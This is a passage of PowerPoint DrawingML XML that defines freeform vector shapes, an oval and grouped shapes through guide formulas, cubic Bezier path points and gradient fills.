                    <a:gd name="T29" fmla="*/ 117 h 200"/>
                    <a:gd name="T30" fmla="*/ 36 w 254"/>
                    <a:gd name="T31" fmla="*/ 116 h 200"/>
                    <a:gd name="T32" fmla="*/ 43 w 254"/>
                    <a:gd name="T33" fmla="*/ 114 h 200"/>
                    <a:gd name="T34" fmla="*/ 44 w 254"/>
                    <a:gd name="T35" fmla="*/ 76 h 200"/>
                    <a:gd name="T36" fmla="*/ 41 w 254"/>
                    <a:gd name="T37" fmla="*/ 77 h 200"/>
                    <a:gd name="T38" fmla="*/ 44 w 254"/>
                    <a:gd name="T39" fmla="*/ 53 h 200"/>
                    <a:gd name="T40" fmla="*/ 43 w 254"/>
                    <a:gd name="T41" fmla="*/ 171 h 200"/>
                    <a:gd name="T42" fmla="*/ 53 w 254"/>
                    <a:gd name="T43" fmla="*/ 183 h 200"/>
                    <a:gd name="T44" fmla="*/ 111 w 254"/>
                    <a:gd name="T45" fmla="*/ 199 h 200"/>
                    <a:gd name="T46" fmla="*/ 140 w 254"/>
                    <a:gd name="T47" fmla="*/ 177 h 200"/>
                    <a:gd name="T48" fmla="*/ 140 w 254"/>
                    <a:gd name="T49" fmla="*/ 171 h 200"/>
                    <a:gd name="T50" fmla="*/ 140 w 254"/>
                    <a:gd name="T51" fmla="*/ 139 h 200"/>
                    <a:gd name="T52" fmla="*/ 139 w 254"/>
                    <a:gd name="T53" fmla="*/ 98 h 200"/>
                    <a:gd name="T54" fmla="*/ 137 w 254"/>
                    <a:gd name="T55" fmla="*/ 84 h 200"/>
                    <a:gd name="T56" fmla="*/ 136 w 254"/>
                    <a:gd name="T57" fmla="*/ 79 h 200"/>
                    <a:gd name="T58" fmla="*/ 137 w 254"/>
                    <a:gd name="T59" fmla="*/ 84 h 200"/>
                    <a:gd name="T60" fmla="*/ 139 w 254"/>
                    <a:gd name="T61" fmla="*/ 98 h 200"/>
                    <a:gd name="T62" fmla="*/ 145 w 254"/>
                    <a:gd name="T63" fmla="*/ 136 h 200"/>
                    <a:gd name="T64" fmla="*/ 145 w 254"/>
                    <a:gd name="T65" fmla="*/ 137 h 200"/>
                    <a:gd name="T66" fmla="*/ 145 w 254"/>
                    <a:gd name="T67" fmla="*/ 137 h 200"/>
                    <a:gd name="T68" fmla="*/ 145 w 254"/>
                    <a:gd name="T69" fmla="*/ 142 h 200"/>
                    <a:gd name="T70" fmla="*/ 155 w 254"/>
                    <a:gd name="T71" fmla="*/ 165 h 200"/>
                    <a:gd name="T72" fmla="*/ 170 w 254"/>
                    <a:gd name="T73" fmla="*/ 171 h 200"/>
                    <a:gd name="T74" fmla="*/ 223 w 254"/>
                    <a:gd name="T75" fmla="*/ 155 h 200"/>
                    <a:gd name="T76" fmla="*/ 209 w 254"/>
                    <a:gd name="T77" fmla="*/ 119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54" h="200">
                      <a:moveTo>
                        <a:pt x="209" y="119"/>
                      </a:moveTo>
                      <a:cubicBezTo>
                        <a:pt x="207" y="121"/>
                        <a:pt x="197" y="123"/>
                        <a:pt x="184" y="127"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="179" y="94"/>
                        <a:pt x="175" y="64"/>
                        <a:pt x="173" y="55"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="170" y="36"/>
                        <a:pt x="153" y="30"/>
                        <a:pt x="144" y="27"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="136" y="23"/>
                        <a:pt x="110" y="18"/>
                        <a:pt x="96" y="14"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="83" y="10"/>
                        <a:pt x="61" y="4"/>
                        <a:pt x="51" y="2"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="41" y="0"/>
                        <a:pt x="21" y="4"/>
                        <a:pt x="18" y="13"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="16" y="16"/>
                        <a:pt x="10" y="56"/>
                        <a:pt x="3" y="96"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="3" y="96"/>
                        <a:pt x="3" y="96"/>
                        <a:pt x="3" y="96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0" y="109"/>
                        <a:pt x="4" y="116"/>
                        <a:pt x="9" y="118"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="14" y="121"/>
                        <a:pt x="20" y="120"/>
                        <a:pt x="26" y="119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4" y="117"/>
                        <a:pt x="35" y="117"/>
                        <a:pt x="36" y="116"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="38" y="116"/>
                        <a:pt x="41" y="115"/>
                        <a:pt x="43" y="114"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="44" y="76"/>
                        <a:pt x="44" y="76"/>
                        <a:pt x="44" y="76"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="43" y="76"/>
                        <a:pt x="42" y="77"/>
                        <a:pt x="41" y="77"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="43" y="60"/>
                        <a:pt x="44" y="49"/>
                        <a:pt x="44" y="53"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="44" y="59"/>
                        <a:pt x="43" y="123"/>
                        <a:pt x="43" y="171"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="44" y="177"/>
                        <a:pt x="47" y="182"/>
                        <a:pt x="53" y="183"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="67" y="186"/>
                        <a:pt x="102" y="197"/>
                        <a:pt x="111" y="199"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="120" y="200"/>
                        <a:pt x="138" y="190"/>
                        <a:pt x="140" y="177"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="140" y="175"/>
                        <a:pt x="140" y="173"/>
                        <a:pt x="140" y="171"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="140" y="139"/>
                        <a:pt x="140" y="139"/>
                        <a:pt x="140" y="139"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="140" y="124"/>
                        <a:pt x="140" y="111"/>
                        <a:pt x="139" y="98"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="138" y="92"/>
                        <a:pt x="137" y="87"/>
                        <a:pt x="137" y="84"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="136" y="82"/>
                        <a:pt x="136" y="80"/>
                        <a:pt x="136" y="79"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="136" y="80"/>
                        <a:pt x="136" y="82"/>
                        <a:pt x="137" y="84"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="138" y="88"/>
                        <a:pt x="138" y="93"/>
                        <a:pt x="139" y="98"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="140" y="108"/>
                        <a:pt x="142" y="120"/>
                        <a:pt x="145" y="136"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="145" y="136"/>
                        <a:pt x="145" y="137"/>
                        <a:pt x="145" y="137"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="145" y="137"/>
                        <a:pt x="145" y="137"/>
                        <a:pt x="145" y="137"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="145" y="142"/>
                        <a:pt x="145" y="142"/>
                        <a:pt x="145" y="142"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="148" y="154"/>
                        <a:pt x="151" y="161"/>
                        <a:pt x="155" y="165"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="159" y="169"/>
                        <a:pt x="164" y="170"/>
                        <a:pt x="170" y="171"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="186" y="167"/>
                        <a:pt x="204" y="161"/>
                        <a:pt x="223" y="155"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="254" y="147"/>
                        <a:pt x="236" y="110"/>
                        <a:pt x="209" y="119"/>
                      </a:cubicBez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58" name="Freeform 1785">
                  <a:extLst>
                    <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                      <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{8273A706-E9FA-4514-8BFC-38CA00E693E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40" y="1214"/>
                  <a:ext cx="89" cy="56"/>
                </a:xfrm>
                <a:custGeom>
                  <a:avLst/>
                  <a:gdLst>
                    <a:gd name="T0" fmla="*/ 30 w 66"/>
                    <a:gd name="T1" fmla="*/ 39 h 41"/>
                    <a:gd name="T2" fmla="*/ 10 w 66"/>
                    <a:gd name="T3" fmla="*/ 23 h 41"/>
                    <a:gd name="T4" fmla="*/ 16 w 66"/>
                    <a:gd name="T5" fmla="*/ 13 h 41"/>
                    <a:gd name="T6" fmla="*/ 54 w 66"/>
                    <a:gd name="T7" fmla="*/ 16 h 41"/>
                    <a:gd name="T8" fmla="*/ 57 w 66"/>
                    <a:gd name="T9" fmla="*/ 29 h 41"/>
                    <a:gd name="T10" fmla="*/ 30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6"/>
                        <a:pt x="16" y="13"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="18" y="10"/>
                        <a:pt x="54" y="0"/>
                        <a:pt x="54" y="16"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="54" y="21"/>
                        <a:pt x="47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59" name="Oval 1786">
                  <a:extLst>
                    <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                      <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{95357118-0970-4DEA-93B7-CB01AEC353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flipH="1">
                  <a:off x="2429" y="1132"/>
                  <a:ext cx="119" cy="119"/>
                </a:xfrm>
                <a:prstGeom prst="ellipse">
                  <a:avLst/>
                </a:prstGeom>
                <a:solidFill>
                  <a:srgbClr val="FFCC99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49" name="Group 1793">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{7DC742BC-8842-495E-B36F-9BD65C9228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99225" y="2528888"/>
                <a:ext cx="246063" cy="382588"/>
                <a:chOff x="2363" y="1132"/>
                <a:chExt cx="343" cy="529"/>
              </a:xfrm>
            </p:grpSpPr>
            <p:sp>
              <p:nvSpPr>
                <p:cNvPr id="2050" name="Freeform 1794">
                  <a:extLst>
                    <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                      <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C8BA2991-28B1-4EB5-B2A8-2A32454B897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74" y="1449"/>
                  <a:ext cx="145" cy="189"/>
                </a:xfrm>
                <a:custGeom>
                  <a:avLst/>
                  <a:gdLst>
                    <a:gd name="T0" fmla="*/ 108 w 108"/>
                    <a:gd name="T1" fmla="*/ 36 h 140"/>
                    <a:gd name="T2" fmla="*/ 108 w 108"/>
                    <a:gd name="T3" fmla="*/ 35 h 140"/>
                    <a:gd name="T4" fmla="*/ 108 w 108"/>
                    <a:gd name="T5" fmla="*/ 28 h 140"/>
                    <a:gd name="T6" fmla="*/ 108 w 108"/>
                    <a:gd name="T7" fmla="*/ 23 h 140"/>
                    <a:gd name="T8" fmla="*/ 108 w 108"/>
                    <a:gd name="T9" fmla="*/ 22 h 140"/>
                    <a:gd name="T10" fmla="*/ 108 w 108"/>
                    <a:gd name="T11" fmla="*/ 17 h 140"/>
                    <a:gd name="T12" fmla="*/ 108 w 108"/>
                    <a:gd name="T13" fmla="*/ 16 h 140"/>
                    <a:gd name="T14" fmla="*/ 108 w 108"/>
                    <a:gd name="T15" fmla="*/ 16 h 140"/>
                    <a:gd name="T16" fmla="*/ 89 w 108"/>
                    <a:gd name="T17" fmla="*/ 7 h 140"/>
                    <a:gd name="T18" fmla="*/ 64 w 108"/>
                    <a:gd name="T19" fmla="*/ 2 h 140"/>
                    <a:gd name="T20" fmla="*/ 57 w 108"/>
                    <a:gd name="T21" fmla="*/ 4 h 140"/>
                    <a:gd name="T22" fmla="*/ 49 w 108"/>
                    <a:gd name="T23" fmla="*/ 6 h 140"/>
                    <a:gd name="T24" fmla="*/ 49 w 108"/>
                    <a:gd name="T25" fmla="*/ 6 h 140"/>
                    <a:gd name="T26" fmla="*/ 0 w 108"/>
                    <a:gd name="T27" fmla="*/ 18 h 140"/>
                    <a:gd name="T28" fmla="*/ 29 w 108"/>
                    <a:gd name="T29" fmla="*/ 47 h 140"/>
                    <a:gd name="T30" fmla="*/ 62 w 108"/>
                    <a:gd name="T31" fmla="*/ 40 h 140"/>
                    <a:gd name="T32" fmla="*/ 62 w 108"/>
                    <a:gd name="T33" fmla="*/ 118 h 140"/>
                    <a:gd name="T34" fmla="*/ 101 w 108"/>
                    <a:gd name="T35" fmla="*/ 129 h 140"/>
                    <a:gd name="T36" fmla="*/ 108 w 108"/>
                    <a:gd name="T37" fmla="*/ 117 h 140"/>
                    <a:gd name="T38" fmla="*/ 108 w 108"/>
                    <a:gd name="T39" fmla="*/ 36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08" h="140">
                      <a:moveTo>
                        <a:pt x="108" y="36"/>
                      </a:moveTo>
                      <a:cubicBezTo>
                        <a:pt x="108" y="36"/>
                        <a:pt x="108" y="36"/>
                        <a:pt x="108" y="35"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="108" y="33"/>
                        <a:pt x="108" y="30"/>
                        <a:pt x="108" y="28"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="108" y="28"/>
                        <a:pt x="108" y="26"/>
                        <a:pt x="108" y="23"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="108" y="23"/>
                        <a:pt x="108" y="22"/>
                        <a:pt x="108" y="22"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="108" y="21"/>
                        <a:pt x="108" y="19"/>
                        <a:pt x="108" y="17"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="108" y="17"/>
                        <a:pt x="108" y="17"/>
                        <a:pt x="108" y="16"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="108" y="16"/>
                        <a:pt x="108" y="16"/>
                        <a:pt x="108" y="16"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="105" y="4"/>
                        <a:pt x="95" y="8"/>
                        <a:pt x="89" y="7"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="85" y="6"/>
                        <a:pt x="73" y="0"/>
                        <a:pt x="64" y="2"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="60" y="3"/>
                        <a:pt x="57" y="4"/>
                        <a:pt x="57" y="4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29" y="47"/>
                        <a:pt x="29" y="47"/>
                        <a:pt x="29" y="47"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="62" y="40"/>
                        <a:pt x="62" y="40"/>
                        <a:pt x="62" y="40"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="62" y="67"/>
                        <a:pt x="62" y="109"/>
                        <a:pt x="62" y="118"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="63" y="138"/>
                        <a:pt x="89" y="140"/>
                        <a:pt x="101" y="129"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="105" y="126"/>
                        <a:pt x="108" y="122"/>
                        <a:pt x="108" y="117"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="108" y="101"/>
                        <a:pt x="107" y="69"/>
                        <a:pt x="108" y="3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50000">
                      <a:srgbClr val="FFFFFF">
                        <a:gamma/>
                        <a:shade val="85882"/>
                        <a:invGamma/>
                      </a:srgbClr>
                    </a:gs>
                    <a:gs pos="100000">
                      <a:srgbClr val="FFFFFF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51" name="Freeform 1795">
                  <a:extLst>
                    <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                      <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{907A8D27-7BCD-449C-AE5F-4548D4DA353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18" y="1435"/>
                  <a:ext cx="267" cy="226"/>
                </a:xfrm>
                <a:custGeom>
                  <a:avLst/>
                  <a:gdLst>
                    <a:gd name="T0" fmla="*/ 196 w 197"/>
                    <a:gd name="T1" fmla="*/ 44 h 167"/>
                    <a:gd name="T2" fmla="*/ 196 w 197"/>
                    <a:gd name="T3" fmla="*/ 37 h 167"/>
                    <a:gd name="T4" fmla="*/ 177 w 197"/>
                    <a:gd name="T5" fmla="*/ 18 h 167"/>
                    <a:gd name="T6" fmla="*/ 137 w 197"/>
                    <a:gd name="T7" fmla="*/ 25 h 167"/>
                    <a:gd name="T8" fmla="*/ 99 w 197"/>
                    <a:gd name="T9" fmla="*/ 35 h 167"/>
                    <a:gd name="T10" fmla="*/ 99 w 197"/>
                    <a:gd name="T11" fmla="*/ 52 h 167"/>
                    <a:gd name="T12" fmla="*/ 99 w 197"/>
                    <a:gd name="T13" fmla="*/ 35 h 167"/>
                    <a:gd name="T14" fmla="*/ 99 w 197"/>
                    <a:gd name="T15" fmla="*/ 35 h 167"/>
                    <a:gd name="T16" fmla="*/ 99 w 197"/>
                    <a:gd name="T17" fmla="*/ 2 h 167"/>
                    <a:gd name="T18" fmla="*/ 89 w 197"/>
                    <a:gd name="T19" fmla="*/ 14 h 167"/>
                    <a:gd name="T20" fmla="*/ 2 w 197"/>
                    <a:gd name="T21" fmla="*/ 8 h 167"/>
                    <a:gd name="T22" fmla="*/ 2 w 197"/>
                    <a:gd name="T23" fmla="*/ 10 h 167"/>
                    <a:gd name="T24" fmla="*/ 2 w 197"/>
                    <a:gd name="T25" fmla="*/ 31 h 167"/>
                    <a:gd name="T26" fmla="*/ 12 w 197"/>
                    <a:gd name="T27" fmla="*/ 67 h 167"/>
                    <a:gd name="T28" fmla="*/ 70 w 197"/>
                    <a:gd name="T29" fmla="*/ 83 h 167"/>
                    <a:gd name="T30" fmla="*/ 83 w 197"/>
                    <a:gd name="T31" fmla="*/ 82 h 167"/>
                    <a:gd name="T32" fmla="*/ 149 w 197"/>
                    <a:gd name="T33" fmla="*/ 65 h 167"/>
                    <a:gd name="T34" fmla="*/ 150 w 197"/>
                    <a:gd name="T35" fmla="*/ 137 h 167"/>
                    <a:gd name="T36" fmla="*/ 150 w 197"/>
                    <a:gd name="T37" fmla="*/ 141 h 167"/>
                    <a:gd name="T38" fmla="*/ 197 w 197"/>
                    <a:gd name="T39" fmla="*/ 140 h 167"/>
                    <a:gd name="T40" fmla="*/ 196 w 197"/>
                    <a:gd name="T41" fmla="*/ 4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7" h="167">
                      <a:moveTo>
                        <a:pt x="196" y="44"/>
                      </a:moveTo>
                      <a:cubicBezTo>
                        <a:pt x="196" y="44"/>
                        <a:pt x="196" y="40"/>
                        <a:pt x="196" y="37"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="193" y="23"/>
                        <a:pt x="183" y="19"/>
                        <a:pt x="177" y="18"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="168" y="17"/>
                        <a:pt x="137" y="25"/>
                        <a:pt x="137" y="2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20"/>
                        <a:pt x="99" y="4"/>
                        <a:pt x="99" y="2"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="98" y="8"/>
                        <a:pt x="95" y="13"/>
                        <a:pt x="89" y="14"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="80" y="16"/>
                        <a:pt x="0" y="0"/>
                        <a:pt x="2" y="8"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="2" y="9"/>
                        <a:pt x="2" y="9"/>
                        <a:pt x="2" y="10"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="2" y="31"/>
                        <a:pt x="2" y="31"/>
                        <a:pt x="2" y="31"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="2" y="55"/>
                        <a:pt x="0" y="64"/>
                        <a:pt x="12" y="67"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="18" y="69"/>
                        <a:pt x="66" y="82"/>
                        <a:pt x="70" y="83"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="73" y="83"/>
                        <a:pt x="78" y="84"/>
                        <a:pt x="83" y="82"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="97" y="78"/>
                        <a:pt x="127" y="71"/>
                        <a:pt x="149" y="65"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="150" y="137"/>
                        <a:pt x="150" y="137"/>
                        <a:pt x="150" y="137"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="150" y="138"/>
                        <a:pt x="150" y="140"/>
                        <a:pt x="150" y="141"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="151" y="167"/>
                        <a:pt x="196" y="163"/>
                        <a:pt x="197" y="140"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="196" y="125"/>
                        <a:pt x="196" y="60"/>
                        <a:pt x="196" y="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50000">
                      <a:srgbClr val="FFFFFF">
                        <a:gamma/>
                        <a:shade val="85882"/>
                        <a:invGamma/>
                      </a:srgbClr>
                    </a:gs>
                    <a:gs pos="100000">
                      <a:srgbClr val="FFFFFF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52" name="Freeform 1796">
                  <a:extLst>
                    <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                      <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{9F337500-E5F0-4C8C-B008-E20601EDA3A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363" y="1229"/>
                  <a:ext cx="343" cy="269"/>
                </a:xfrm>
                <a:custGeom>
                  <a:avLst/>
                  <a:gdLst>
                    <a:gd name="T0" fmla="*/ 209 w 254"/>
                    <a:gd name="T1" fmla="*/ 119 h 200"/>
                    <a:gd name="T2" fmla="*/ 184 w 254"/>
                    <a:gd name="T3" fmla="*/ 127 h 200"/>
                    <a:gd name="T4" fmla="*/ 173 w 254"/>
                    <a:gd name="T5" fmla="*/ 55 h 200"/>
                    <a:gd name="T6" fmla="*/ 144 w 254"/>
                    <a:gd name="T7" fmla="*/ 27 h 200"/>
                    <a:gd name="T8" fmla="*/ 96 w 254"/>
                    <a:gd name="T9" fmla="*/ 14 h 200"/>
                    <a:gd name="T10" fmla="*/ 51 w 254"/>
                    <a:gd name="T11" fmla="*/ 2 h 200"/>
                    <a:gd name="T12" fmla="*/ 18 w 254"/>
                    <a:gd name="T13" fmla="*/ 13 h 200"/>
                    <a:gd name="T14" fmla="*/ 3 w 254"/>
                    <a:gd name="T15" fmla="*/ 96 h 200"/>
                    <a:gd name="T16" fmla="*/ 3 w 254"/>
                    <a:gd name="T17" fmla="*/ 96 h 200"/>
                    <a:gd name="T18" fmla="*/ 2 w 254"/>
                    <a:gd name="T19" fmla="*/ 99 h 200"/>
                    <a:gd name="T20" fmla="*/ 2 w 254"/>
                    <a:gd name="T21" fmla="*/ 99 h 200"/>
                    <a:gd name="T22" fmla="*/ 9 w 254"/>
                    <a:gd name="T23" fmla="*/ 118 h 200"/>
                    <a:gd name="T24" fmla="*/ 26 w 254"/>
                    <a:gd name="T25" fmla="*/ 119 h 200"/>
                    <a:gd name="T26" fmla="*/ 33 w 254"/>
                    <a:gd name="T27" fmla="*/ 117 h 200"/>
                    <a:gd name="T28" fmla="*/ 33 w 254"/>
                    <a:gd name="T29" fmla="*/ 117 h 200"/>
                    <a:gd name="T30" fmla="*/ 36 w 254"/>
                    <a:gd name="T31" fmla="*/ 116 h 200"/>
                    <a:gd name="T32" fmla="*/ 43 w 254"/>
                    <a:gd name="T33" fmla="*/ 114 h 200"/>
                    <a:gd name="T34" fmla="*/ 44 w 254"/>
                    <a:gd name="T35" fmla="*/ 76 h 200"/>
                    <a:gd name="T36" fmla="*/ 41 w 254"/>
                    <a:gd name="T37" fmla="*/ 77 h 200"/>
                    <a:gd name="T38" fmla="*/ 44 w 254"/>
                    <a:gd name="T39" fmla="*/ 53 h 200"/>
                    <a:gd name="T40" fmla="*/ 43 w 254"/>
                    <a:gd name="T41" fmla="*/ 171 h 200"/>
                    <a:gd name="T42" fmla="*/ 53 w 254"/>
                    <a:gd name="T43" fmla="*/ 183 h 200"/>
                    <a:gd name="T44" fmla="*/ 111 w 254"/>
                    <a:gd name="T45" fmla="*/ 199 h 200"/>
                    <a:gd name="T46" fmla="*/ 140 w 254"/>
                    <a:gd name="T47" fmla="*/ 177 h 200"/>
                    <a:gd name="T48" fmla="*/ 140 w 254"/>
                    <a:gd name="T49" fmla="*/ 171 h 200"/>
                    <a:gd name="T50" fmla="*/ 140 w 254"/>
                    <a:gd name="T51" fmla="*/ 139 h 200"/>
                    <a:gd name="T52" fmla="*/ 139 w 254"/>
                    <a:gd name="T53" fmla="*/ 98 h 200"/>
                    <a:gd name="T54" fmla="*/ 137 w 254"/>
                    <a:gd name="T55" fmla="*/ 84 h 200"/>
                    <a:gd name="T56" fmla="*/ 136 w 254"/>
                    <a:gd name="T57" fmla="*/ 79 h 200"/>
                    <a:gd name="T58" fmla="*/ 137 w 254"/>
                    <a:gd name="T59" fmla="*/ 84 h 200"/>
                    <a:gd name="T60" fmla="*/ 139 w 254"/>
                    <a:gd name="T61" fmla="*/ 98 h 200"/>
                    <a:gd name="T62" fmla="*/ 145 w 254"/>
                    <a:gd name="T63" fmla="*/ 136 h 200"/>
                    <a:gd name="T64" fmla="*/ 145 w 254"/>
                    <a:gd name="T65" fmla="*/ 137 h 200"/>
                    <a:gd name="T66" fmla="*/ 145 w 254"/>
                    <a:gd name="T67" fmla="*/ 137 h 200"/>
                    <a:gd name="T68" fmla="*/ 145 w 254"/>
                    <a:gd name="T69" fmla="*/ 142 h 200"/>
                    <a:gd name="T70" fmla="*/ 155 w 254"/>
                    <a:gd name="T71" fmla="*/ 165 h 200"/>
                    <a:gd name="T72" fmla="*/ 170 w 254"/>
                    <a:gd name="T73" fmla="*/ 171 h 200"/>
                    <a:gd name="T74" fmla="*/ 223 w 254"/>
                    <a:gd name="T75" fmla="*/ 155 h 200"/>
                    <a:gd name="T76" fmla="*/ 209 w 254"/>
                    <a:gd name="T77" fmla="*/ 119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54" h="200">
                      <a:moveTo>
                        <a:pt x="209" y="119"/>
                      </a:moveTo>
                      <a:cubicBezTo>
                        <a:pt x="207" y="121"/>
                        <a:pt x="197" y="123"/>
                        <a:pt x="184" y="127"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="179" y="94"/>
                        <a:pt x="175" y="64"/>
                        <a:pt x="173" y="55"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="170" y="36"/>
                        <a:pt x="153" y="30"/>
                        <a:pt x="144" y="27"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="136" y="23"/>
                        <a:pt x="110" y="18"/>
                        <a:pt x="96" y="14"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="83" y="10"/>
                        <a:pt x="61" y="4"/>
                        <a:pt x="51" y="2"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="41" y="0"/>
                        <a:pt x="21" y="4"/>
                        <a:pt x="18" y="13"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="16" y="16"/>
                        <a:pt x="10" y="56"/>
                        <a:pt x="3" y="96"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="3" y="96"/>
                        <a:pt x="3" y="96"/>
                        <a:pt x="3" y="96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0" y="109"/>
                        <a:pt x="4" y="116"/>
                        <a:pt x="9" y="118"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="14" y="121"/>
                        <a:pt x="20" y="120"/>
                        <a:pt x="26" y="119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4" y="117"/>
                        <a:pt x="35" y="117"/>
                        <a:pt x="36" y="116"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="38" y="116"/>
                        <a:pt x="41" y="115"/>
                        <a:pt x="43" y="114"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="44" y="76"/>
                        <a:pt x="44" y="76"/>
                        <a:pt x="44" y="76"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="43" y="76"/>
                        <a:pt x="42" y="77"/>
                        <a:pt x="41" y="77"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="43" y="60"/>
                        <a:pt x="44" y="49"/>
                        <a:pt x="44" y="53"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="44" y="59"/>
                        <a:pt x="43" y="123"/>
                        <a:pt x="43" y="171"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="44" y="177"/>
                        <a:pt x="47" y="182"/>
                        <a:pt x="53" y="183"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="67" y="186"/>
                        <a:pt x="102" y="197"/>
                        <a:pt x="111" y="199"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="120" y="200"/>
                        <a:pt x="138" y="190"/>
                        <a:pt x="140" y="177"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="140" y="175"/>
